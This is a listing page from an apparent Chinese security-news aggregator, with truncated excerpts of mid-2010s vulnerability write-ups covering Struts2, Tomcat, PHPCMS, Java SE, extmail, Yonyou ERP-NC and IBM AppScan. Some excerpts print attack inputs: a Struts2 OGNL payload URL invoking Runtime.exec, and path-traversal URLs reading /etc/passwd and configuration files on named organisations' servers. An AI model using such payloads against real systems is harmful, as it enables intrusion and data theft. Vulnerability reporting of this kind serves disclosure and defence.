记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

PostScript语言安全研究(一)ImageMagick新漏洞分析

Author:数据流(Flyin9_L) 前言:主流的东西太多了,还是研究一些非主流的语言好玩。PostScript(PS)是一种页面描述性语言,由Adobe开发,后由Apple推进发展。开始是应用于工业印刷绘图排版,现在广泛适用于打印机。虽然PostScript是比较冷门的语言,但与我们比较熟悉的PDF的部分元素也是由PostScript语言编写。利用PS的特性与弱点可对解析器与打印机进行攻击,而一些基础组件例如ImageMagick解析ps文件时会依赖外部解析器,所以也可对IM进行攻击。 0x00 PostScript语言入门 由于一般PS语言由机器自动生成,因此关于手写PS语言的资料非常罕见,只能从老外一些零星的资料与解析器的官方文档进行了解。这里我也顺便讲解下PS语言的基础,因为PS语言的中文资料寥寥
发布时间:2016-10-17 00:40 | 阅读:80549 | 评论:0 | 标签:Linux/Unix Others 漏洞

Tomcat 服务本地提权漏洞预警

from:长亭科技订阅号 10月1日,Tomcat爆出了一个本地提权漏洞。通过该漏洞,攻击者可以通过一个低权限的Tomcat用户获得系统的root权限。 漏洞相关信息:   CVE ID: CVE-2016-1240 漏洞原理: 在Debian系统的Linux上管理员通常利用apt-get进行包管理,deb包是Unixar的标准归档,讲包文件信息以及包内容,经过gzip和tar打包而成。 该问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本,该脚本位于/etc/init.d/tomcat*, 跟踪代码如下:171     # Run the catalina.sh script as a daemon   set +
发布时间:2016-10-08 07:10 | 阅读:123858 | 评论:0 | 标签:Linux/Unix Others Tomcat 本地提权 漏洞 提权

PHPCMS V9最新版本后台设计缺陷导致getshell

from:http://www.cnbraid.com/2016/09/14/phpcms/ 0x01 背景 周末审计了下phpcms的最新版本,前台已经很难找到漏洞了,故看了看后台相关的代码,发现还是有一处可以拿shell的漏洞。由于默认安装后需要超级管理员权限,故该漏洞很鸡肋,但感觉应该会在其它cms中也存在,所以主要分享下挖掘思路~ PS:使用的测试环境是php5.6(已经移除gpc选项) 0x02 漏洞分析 漏洞起源: yoursitephpsso_serverphpcmsmodulesadminsystem.php下的uc函数:<?php public function uc() { if (isset($_POST['dosubmit'])) { $data = isset($
发布时间:2016-09-19 15:20 | 阅读:318603 | 评论:0 | 标签:Others PHP cms phpcms

Struts2 最新漏洞S037分析!

AT: PKAV-香草 无声说安全 发现struts2又出了新漏洞S2-033 官方的的意思是说如果使用了REST插件并且开启了动态方法执行 但是经过研究发现,其实并不需要开启动态方法执行,因此可以通杀所有安装了REST的struts2,包括官方认为不存在漏洞的 Struts 2.3.20.3, 2.3.24.3 and 2.3.28.1 。官方认为的s033的POC是这样的: http://127.0.0.1:8888/struts2-rest-showcase/orders/3!%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(%23param
发布时间:2016-06-17 00:55 | 阅读:85053 | 评论:0 | 标签:JSP Others s037 Struts2 漏洞

Apache Continuum 1.4.2 – Multiple Vulnerabilities

# Exploit Title: Unauthenticated command injection - Apache Continuum # Google Dork: inurl::8080/continuum/ # Date: 04/06/2016 # Exploit Author: David Shanahan (@cyberpunksec) # Contact: http://www.procheckup.com/ # Vendor Homepage: https://continuum.apache.org/ # Software Link: https://continuum.apache.org/download.cgi # Version: 1.4.2 # Tested on: Debian
发布时间:2016-06-17 00:55 | 阅读:123028 | 评论:0 | 标签:Linux/Unix Others apache 漏洞

Oracle out-of-band release for Java SE Vulnerability

0)漏洞简介 漏洞编号:CVE-2016-0636,此漏洞是安全研究员(Adam Gowdiak)于2013年报告给Oracle的漏洞(CVE-2013-5838)的变体。由于Oracle在部分代码分支中未对该漏洞进行修补,导致了此漏洞再现江湖,影响版本:java SE 7u97, 8u73, 8u74。 1)测试环境 Windows 7 x86 + jdk_1.8.0_74 2)漏洞分析 由于反射API的实现存在缺陷,当方法句柄(MethodHandles)处理目标类的成员函数时,因对函数参数的类型校验不严谨,可导致类型混淆。校验过程如下图所示: 其中clazz代表目标类,type代表clazz类的成员函数,具体验证代码如下图所示: 其中loadersAreRelated的实现代码如下:<spa
发布时间:2016-03-29 22:00 | 阅读:94749 | 评论:0 | 标签:Others exp Java oracle 漏洞

extmail邮件服务存在漏洞读取任意用户邮件内容

漏洞作者: 路人甲 简要描述: 1.网络磁盘 越权访问上层目录泄露文件名 2.通过添加附件将敏感文件发送到指定邮箱 3.获取邮件ID后读取任意邮件内容 详细说明: 漏洞1. code 区域 GET http://**.**.**.**/extmail/cgi/netdisk.cgi?__mode=list_dir&amp;sid=xxxxf&amp;base=../.. HTTP/1.1 漏洞2. 漏洞3. code 区域 GET http://**.**.**.**/extmail/cgi/readmsg.cgi?__mode=readmsg_sum&amp;sid=xxxxxxxxxxxx&amp;folder=Inbox&amp;msgid=142532
发布时间:2016-01-04 14:55 | 阅读:100395 | 评论:0 | 标签:Others extmail 漏洞 读取 邮件服务

用友ERP-NC某处通用文件包含漏洞

漏洞作者: 管管侠 详细说明: 可以遍历各种系统文件,影响大量知名政校企 漏洞证明: 中粮集团 http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd 还可以读取默认配置文件 http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 下面有中粮几十组数据库配置,数据库群 民生电商 http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&
发布时间:2016-01-04 14:55 | 阅读:139920 | 评论:0 | 标签:Others ERP-NC 文件包含 漏洞 用友 通用

IBM Security AppScan Standard OLE Automation Array Remote Code Execution

#!/usr/bin/python import BaseHTTPServer, socket ## # IBM Security AppScan Standard OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 # # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploi
发布时间:2015-06-15 06:05 | 阅读:98547 | 评论:0 | 标签:Linux/Unix Others Windows AppScan IBM Remote Code Execution

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云